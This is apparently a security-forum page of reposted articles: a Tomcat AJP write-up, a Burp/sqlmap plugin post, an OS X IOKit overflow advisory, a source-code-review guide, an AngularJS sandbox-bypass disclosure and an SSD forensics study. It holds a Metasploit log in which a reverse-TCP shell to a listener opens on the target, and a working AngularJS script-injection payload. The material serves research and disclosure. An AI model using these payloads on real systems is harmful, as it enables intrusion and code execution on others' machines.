Here is the metasploit output also: msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST localhost yes The target address RPORT 80 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.195.156 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on 192.168.195.156:4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 1648 bytes as XWouWv7gyqklF.war ... [*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp... [*] Sending stage (36 bytes) to 192.168.195.155 [*] Undeploying XWouWv7gyqklF ... [*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401) id uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6) References FAQ/Connectors - Tomcat Wiki AJPv13 Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/
  19. Fedora 21 Alpha Is Out – Screenshot Tour The Fedora 21 Alpha can be downloaded from Softpedia By Silviu Stahie on September 24th, 2014 07:36 GMT The Fedora Project has announced that the first Alpha release for Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution. The Fedora development team has been trying to get this Alpha release out the door for quite some time and they have been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up about the final release date. The developers don't have the best track record at keeping a tight schedule for the upcoming builds, so it's very likely that the final iteration will also be pushed back.

It's a new Fedora

Fedora 21 is the first distribution in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so they dropped the naming process entirely. Besides this simple move, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation. "The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The final release of Fedora 21 is expected in December." "We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide. 
Together, we can make Fedora a rock-solid distribution," say the developers.

Get the Fedora 21 Alpha and test it

As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and they will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build. You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development. Sursa: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
  20. [h=1]SQLiPy: A SQLMap Plugin for Burp[/h] By codewatch On September 22, 2014 · Leave a Comment I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general purpose web app assessment tool, but if you perform web app assessments you probably already know that, because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past, as flexible and extensible as Burp is, that no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit in one of two categories: They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or They kick off a SQLMap scan and essentially display what you would see if run in a console window (like gason) I’m not much of a developer, so I never really considered attempting to integrate the two myself until the other day, when I was browsing the SQLMap directory on my machine and noticed the file sqlmapapi.py. I’d never noticed it before (I’m not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way in which to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone already did the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down I set out to write the plugin. 
The key features that I wanted to integrate were: The ability to start the API from within Burp. Note that this is not recommended, as one of the limitations of Jython is that when you start a process with popen, you can’t get the PID, which means you can’t stop the process from within Jython (you have to manually kill it). A context menu option for sending a request in Burp to the plugin. A menu for editing and configuring the request prior to sending to SQLMap. A thread that continuously checks up on executed scans to identify whether there were any findings. Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list. All of those features have been integrated into this first release. I have limited ability to test, so I'd appreciate anyone who can use the plugin and provide feedback. Some general notes on the plugin development: This is the first time I’ve attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it. This is also the first time I’ve used Jython, or used any Java GUI code. The code probably looks awful and I need more comments. See points 1 & 2 above and add in the fact that I’m not a developer. I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser Burp SAML ActiveScan++ WCF Binary SOAP Handler WSDL Wizard co2 Articol complet: https://www.codewatch.org/blog/?p=402
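To give a feel for the API that the plugin builds on, here is a minimal standalone client sketch in Python. The endpoint names follow the unofficial API documentation linked above; the bind address is sqlmapapi.py's default and is an assumption about your setup:

```python
import json
from typing import Optional
from urllib import request

API = "http://127.0.0.1:8775"  # default sqlmapapi.py listen address (assumption)

def api_call(path: str, options: Optional[dict] = None) -> dict:
    """GET when options is None, otherwise POST them as a JSON body."""
    body = None if options is None else json.dumps(options).encode()
    req = request.Request(API + path, data=body,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req) as resp:
        return json.load(resp)

def scan_options(target_url: str, **extra) -> dict:
    """Build the option dict POSTed to /scan/<taskid>/start."""
    return {"url": target_url, **extra}

def start_scan(target_url: str) -> str:
    """Create a task, start a scan against target_url, return the task id."""
    task_id = api_call("/task/new")["taskid"]
    api_call(f"/scan/{task_id}/start", scan_options(target_url))
    return task_id

# Poll results later with: api_call(f"/scan/{task_id}/data")
```

This is essentially the request flow the Burp plugin automates behind its menus.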
  21. OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method:

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
    const UInt32 head = dataQueue->head; // volatile
    const UInt32 tail = dataQueue->tail;
    const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; <-- (a)
    IODataQueueEntry * entry;

    if ( tail >= head )
    {
        // Is there enough room at the end for the entry?
        if ( (tail + entrySize) <= dataQueue->queueSize ) <-- (b)
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize); <-- (c)

The additions at (a) and (b) should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer. The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument; the bug itself is quite simple. This PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue.) This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0 which maps an array of IOHIDElementValues into userspace:

typedef struct _IOHIDElementValue
{
    IOHIDElementCookie cookie;
    UInt32 totalSize;
    AbsoluteTime timestamp;
    UInt32 generation;
    UInt32 value[1];
} IOHIDElementValue;

The first dword of the mapped memory is a cookie value and the second is a size. 
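Replaying the UInt32 arithmetic of the checks at (a) and (b) shows concretely why the bounds check passes; a small sketch in Python (the header size and queue geometry are illustrative values, not the exact kernel constants):

```python
MASK32 = 0xFFFFFFFF            # UInt32 arithmetic wraps modulo 2**32
ENTRY_HEADER_SIZE = 8          # stand-in for DATA_QUEUE_ENTRY_HEADER_SIZE

def enqueue_passes_check(tail: int, data_size: int, queue_size: int):
    """Replay of the vulnerable bounds check in IODataQueue::enqueue."""
    entry_size = (data_size + ENTRY_HEADER_SIZE) & MASK32   # (a) can wrap
    fits = ((tail + entry_size) & MASK32) <= queue_size     # (b) can wrap
    return fits, entry_size

# A dataSize of 0xFFFFFFFE wraps entrySize down to a tiny value, so the
# check passes even though memcpy will later be called with the huge
# original dataSize as its length.
fits, entry_size = enqueue_passes_check(tail=0x100, data_size=0xFFFFFFFE,
                                        queue_size=0x1000)
```

With these sample values, entry_size wraps to 6, the check passes, and the kernel would go on to copy roughly 4 GB over the queue buffer.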
When the IOHIDElementPrivate::processReport method is invoked (in response to an HID event) if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory. The PoC calls the startQueue selector to start the listening queue then calls addElementToQueue passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called this will call IODataQueue::enqueue and overflow the calculation of entry size such that it will attempt to memcpy 0xfffffffe bytes. Note that the size of the queue buffer is also attacker controlled, and the kernel is 64-bit, so a 4gb memcpy is almost certainly exploitable. Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also the symbols for memcpy and real_mode_bootstrap_end seem to have the same address so the lldb backtrace looks weird, but it is actually memcpy. hidlib_enqueue_overflow.c 6.7 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=39
  22. [h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h] We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss out. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed out or very difficult to identify during Penetration Testing. Additionally we hope we will be able to provide answers for the following commonly asked questions: I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application? What are the vulnerabilities found during Source Code Review that are often missed by Application Penetration Test? Read More: Web Application Penetration Testing Service [h=3]Approach for Source Code Review[/h] The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps: [h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h] A security weakness is an insecure practice or a dangerous API call or an insecure design. 
Some examples of weaknesses are: Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; Dangerous or risky API call such as Runtime.exec, Statement.execute Insecure Design such as using only MD5 hashing of passwords without any salt. [h=4]Correlation between Security Weakness and Dynamic Input[/h] Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with an user input and reaches a possibly weak or risky code block. The absence of this phase will leave huge number of false positive in the results. This step generally involves enumerating sources and finding a path between source to sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc. [h=3]Five Vulnerabilities Source Code Review should Find[/h] [h=4]1. Insecure or Weak Cryptographic Implementation[/h] SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as: Use of MD5 or SHA1 without salt for password hashing. Use of Java Random instead of SecureRandom. Use of weak DES encryption. Use of weak mode of otherwise strong encryption such as AES with ECB. Susceptibility to Padding Oracle Attack. [h=4]2. Known Vulnerable Components[/h] For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities especially if the application is developed over a considerable time frame. 
As an example, during 2011, the following two vulnerable components were downloaded 22 million times: Apache CXF with Authentication Bypass Vulnerability Spring Framework with Remote Code Execution Vulnerability During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of the exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Test. [h=4]3. Sensitive Information Disclosure[/h] An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are: Logs: Application logs sensitive information such as credentials or access keys in log files. Configuration Files: Application discloses sensitive information such as shared secret or passwords in plain text configuration files. Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data. Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks. [h=4]4. Insecure Functionalities[/h] An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below: RMI calls over insecure channel. Kerberos implementation that are vulnerable to replay attack. Legacy authentication & authorization technique with known weaknesses. 
J2EE bad practices such as direct management of database/resource connections that may lead to a Denial of Service. Race condition bugs. [h=4]5. Security Misconfiguration[/h] SCR should be able to find common security misconfiguration in an application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include: Application containers and database servers are running with the highest (unnecessary) privilege. Default accounts with password enabled and unchanged. Insecure local file storage. [h=3]Additional Notes[/h] An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above. It is possible to conduct an in-depth review of the implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find code that lacks or misuses such controls in a vulnerable manner, resulting in a bypass of the protection. There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such APIs in a given application easily and quickly during an SCR process. SCR has the added benefit of being non-disruptive i.e. this activity does not require access to the production environment and will not cause any service disruption. Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain classes of vulnerabilities which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute to enhancing overall security of application and infrastructure. Sursa: 5 Vulnerabilities That Surely Need a Source Code Review
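As a toy illustration of the sink-enumeration step described above (not a real SAST tool, and with none of the source-to-sink correlation the article stresses), one can grep Java sources for risky calls like the ones the article lists; the patterns below are illustrative:

```python
import re

# Risky "sink" patterns based on the article's examples. A real SCR would
# correlate these hits with user-controlled sources; this toy scanner does not.
SINKS = {
    "command execution": re.compile(r"Runtime\.\w*exec|getRuntime\(\)\.exec"),
    "dynamic SQL": re.compile(r"Statement\s*\.\s*execute|createStatement"),
    "weak hashing": re.compile(r'MessageDigest\.getInstance\("(MD5|SHA-?1)"\)'),
}

def find_sinks(source: str):
    """Return (line_number, category, line) for each risky call found."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for category, pattern in SINKS.items():
            if pattern.search(line):
                hits.append((lineno, category, line.strip()))
    return hits
```

Running it over `MessageDigest.getInstance("MD5")` or `Runtime.getRuntime().exec(cmd)` flags both lines; the point is only to show why sink enumeration alone produces false positives that the correlation step must then prune.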
  23. Yes. "If you compare a pointer to a function with a number, I automatically convert them to strings and compare them as character strings" - JavaScript. Because fuck logic, that's why.
  24. ___ __ _______ _____ ____ __ / | ____ ____ ___ __/ /___ ______ / / ___/ / ___/____ _____ ____/ / /_ ____ _ __ / /_ __ ______ ____ ___________ / /| | / __ \/ __ `/ / / / / __ `/ ___/_ / /\__ \ \__ \/ __ `/ __ \/ __ / __ \/ __ \| |/_/ / __ \/ / / / __ \/ __ `/ ___/ ___/ / ___ |/ / / / /_/ / /_/ / / /_/ / / / /_/ /___/ / ___/ / /_/ / / / / /_/ / /_/ / /_/ /> < / /_/ / /_/ / /_/ / /_/ (__ |__ ) /_/ |_/_/ /_/\__, /\__,_/_/\__,_/_/ \____//____/ /____/\__,_/_/ /_/\__,_/_.___/\____/_/|_| /_.___/\__, / .___/\__,_/____/____/ /____/ /____/_/ In my recent research I discovered a bypass to the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope, while not breaking any of the implemented rules (eg. Function constructor can't be accessed directly). The main reason I was allowed to do this is because functions executing callbacks, such as Array.sort(), Array.map() and Array.filter() are allowed. If we use the Function constructor as callback, we can carefully construct a payload that generates a valid function that we control both the arguments for, as well as the function body. This results in a sandbox bypass. Example: {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} JSFiddle: http://jsfiddle.net/uwwov8oz Let's break that down. Function constructor can be accessed via toString.constructor. {{Function.prototype.toString=Function.prototype.call;["a","alert(1)"].sort(Function)}} We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this pseudo-code: if(Function("a","alert(1)") > 1){ //Sort element "a" as bigger than "alert(1)" }else if(Function("a","alert(1)") < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that. 
if((function(a){alert(1)}) > 1){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}) < 1){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Now, to understand the next part we must know how JS internally handles comparison of functions. It will convert the function to a string using the toString method (inherited from Object) and compare it as a string. We can show this by running this code: alert==alert.toString(). if((function(a){alert(1)}).toString() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).toString() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } So to sum up: We can create a function where we control the arguments ("a"), as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString() function with the Function.prototype.call() function, and when the comparison runs in the pseudocode, it will run like this: if((function(a){alert(1)}).call() > 1..toString()){ //Sort element "a" as bigger than "alert(1)" }else if((function(a){alert(1)}).call() < 1..toString()){ //Sort element "a" as smaller than "alert(1)" }else{ // Sort elements as same } Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions. I'm not really sure why using the constructor property like this (eg. toString.constructor) works, since it didn't in 1.2.18 and down. Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!) 
and I got a $5000 bug bounty for this bypass. Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8 over and out, avlidienbrunn Sursa: http://avlidienbrunn.se/angular.txt
  25. Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions Posted by belkasoft on September 23, 2014 We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives. Introduction Several years ago, Solid State drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, we are in the waters of stochastic forensics with SSD drives, where nothing can be assumed as a given. With even the most recent publications not going beyond introducing the TRIM command and making a conclusion on SSD self-corrosion, it has been common knowledge – and a common misconception – that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments or on external SSD drives attached as a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands. 
And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example, if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot be practically imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable – even on today’s TRIM-enabled SSD drives. SSD Self-Corrosion In case you haven’t read our 2012 paper on SSD forensics, let’s stop briefly on why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files and data that a suspect attempted to destroy (by e.g. formatting the disk, even if “Quick Format” was engaged) may be lost forever in a matter of minutes. And even shutting the affected computer down immediately after a destructive command has been issued, does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content clear all by itself, even if installed into a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it unless we’re talking of some extremely important evidence, in which case the disk accompanied with a court order can be sent to the manufacturer for low-level, hardware-specific recovery. The evidence self-destruction process is triggered with the TRIM command issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition. 
The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data, and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain better understanding of situations when deleted data can still be recovered from an SSD drive. However, before we begin that part, let’s see how SSD drives of 2014 are different from SSD drives made in 2012. Checking TRIM Status When analyzing a live system, it is easy to check a TRIM status for a particular SSD device by issuing the following command in a terminal window: fsutil behavior query disabledeletenotify You’ll get one of the following results: DisableDeleteNotify = 1 meaning that Windows TRIM commands are disabled DisableDeleteNotify = 0 meaning that Windows TRIM commands are enabled fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with “fsutil behavior set disabledeletenotify 0” or disable TRIM with “fsutil behavior set disabledeletenotify 1”. Figure 1 TRIM, image taken from http://www.corsair.com/us/blog/how-to-check-that-trim-is-active/ Note that using this command only makes sense if analyzing the SSD which is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant. SSD Technology: 2014 Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This did not change in 2014. Two years ago, SSD compression already existed in SandForce SSD Controllers (http://en.wikipedia.org/wiki/SandForce). 
However, relatively few models were equipped with encrypting or compressing controllers. As SandForce remained the only compressing controller, it was easy to determine whether a given drive used compression (http://www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware-controlled version of a SandForce controller to implement data compression in its 3xx and 5xx series SSDs (http://www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of an SSD as the inherent benefits (http://www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http://blog.goplextor.com/?p=3313), and so are most other controllers on the market, including the new budget option, Phison.

Why so much fuss about data compression in SSD drives? Because the use of any technology that alters binary data before it ends up in the flash chips makes recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http://www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of the rare exceptions.

Let's conclude this chapter with a quote from PC World: "The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest." (http://www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html)

In other words, SSDs get bigger and cheaper, inevitably demanding cost-saving measures which, in turn, may affect how deleted data is handled on these SSD drives, in a way described later in the "Reality Steps In: Why Real SSDs are Often Recoverable" chapter.
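As a practical aside before moving on: the fsutil check from the "Checking TRIM Status" section above is easy to wrap in a small triage script. A minimal sketch (assuming Python is available on the live Windows box under analysis; the parsing expects the English "DisableDeleteNotify = N" output format):

```python
import shutil
import subprocess

def parse_trim_status(fsutil_output: str):
    """Interpret 'fsutil behavior query disabledeletenotify' output.

    Returns True when Windows TRIM commands are enabled
    (DisableDeleteNotify = 0), False when disabled, None when unknown.
    """
    for line in fsutil_output.splitlines():
        if "DisableDeleteNotify" in line and "=" in line:
            value = line.split("=", 1)[1].strip().split()[0]
            if value == "0":
                return True   # TRIM enabled
            if value == "1":
                return False  # TRIM disabled
    return None

if __name__ == "__main__" and shutil.which("fsutil"):
    # Only meaningful on a live Windows system, and only while the SSD
    # is still installed in its original computer.
    out = subprocess.run(
        ["fsutil", "behavior", "query", "disabledeletenotify"],
        capture_output=True, text=True,
    ).stdout
    print("TRIM enabled:", parse_trim_status(out))
```

As the article notes, the result is only relevant on the original box; the script is just a convenience when triaging several live systems.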
SSD Manufacturers

In recent years, we've seen a lot of new SSD "manufacturers" entering the arena. These companies don't normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, have enabled dozens of "manufacturers" to make hundreds of nearly indistinguishable SSD models.

So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http://www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/)

Hardware for SSD Forensics (and Why It Has Not Arrived)

Little has changed since 2012 with regard to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, while BGA flash chip acquisition kits remain as rare as hen's teeth.

Why so few chip-off solutions for SSD drives compared to the number of companies doing mobile chip-off? It's hard to say for sure, but it's possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, internal data structures in today's SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines leave the actual data content stored on the flash chips inside SSD drives heavily fragmented.
We're not talking about logical fragmentation at the file system level (which already is a problem, as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file across various physical addresses on numerous physical flash chips. In fact, it is massive parallel writes that make SSD drives so much faster than traditional magnetic drives (as opposed to the sheer writing speed of individual flash chips).

One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on the acquisition technique (and speed) as on the particular implementation of a particular SSD controller.

Deterministic Read After Trim

So let's say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and is available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience in recovering information from SSD drives varies greatly among SSD users.

"I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes", said one Belkasoft customer.

"We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect's laptop. We were able to recover 80% of deleted files several hours after they had been deleted", said another Belkasoft user.

Carving options in Belkasoft Evidence Center: for the experiment we set "Unallocated clusters only" and the SSD drive connected as physical drive 0.

Why such a big inconsistency in user experiences?
The answer lies in the way different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) or Deterministic Zeroes After Trim (DZAT), returning all zeroes immediately after the TRIM command releases a certain data block, while other drives do not implement this protocol and will return the original data until it is physically erased by the garbage collection algorithm.

Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify whether their SSD drive uses DRAT or DZAT by issuing the hdparm -I command, which reports whether the drive supports TRIM and does "Deterministic Read After Trim". Example:

$ sudo hdparm -I /dev/sda | grep -i trim
* Data Set Management TRIM supported (limit 1 block)
* Deterministic read data after TRIM

The adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives both with and without DRAT support; in 2014, the majority of new models come equipped with DRAT or DZAT.

There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives.

Non-deterministic TRIM: each read command after a TRIM may return different data.

Deterministic TRIM (DRAT): all read commands after a TRIM shall return the same data, or become determinate. Note that this level of TRIM does not necessarily return all zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same ("determinate") before and after the affected page has been processed by the garbage collection algorithm, and until new data is written to the page. As a result, the data returned by SSD drives supporting DRAT (as opposed to DZAT) can be all zeroes or some other data, or it can be the original pre-trim data stored in that logical page.
The essential point here is that the values read from a trimmed logical page do not change from the moment the TRIM command has been issued until the moment new data is written to that logical page.

Deterministic Read Zero After Trim (DZAT): all read commands after a TRIM shall return zeroes until new data is written to the page.

As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks have been cleaned immediately following the TRIM command, but because the SSD controller reports that there is no valid data held at the trimmed logical address previously associated with the trimmed physical block. If, however, one could read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, the original data could be obtained from those physical blocks until the blocks are physically erased by the garbage collector. There is no way to address the physical data blocks via the standard ATA command set; however, the disk manufacturer could most probably do this in their own lab. As a result, sending a trimmed SSD disk to the manufacturer for recovery may be a viable proposition if some extremely important evidence is concerned.

Notably, DRAT is not implemented in Windows, as NTFS does not allow applications to read trimmed data.

Acquiring Evidence from SSD Drives

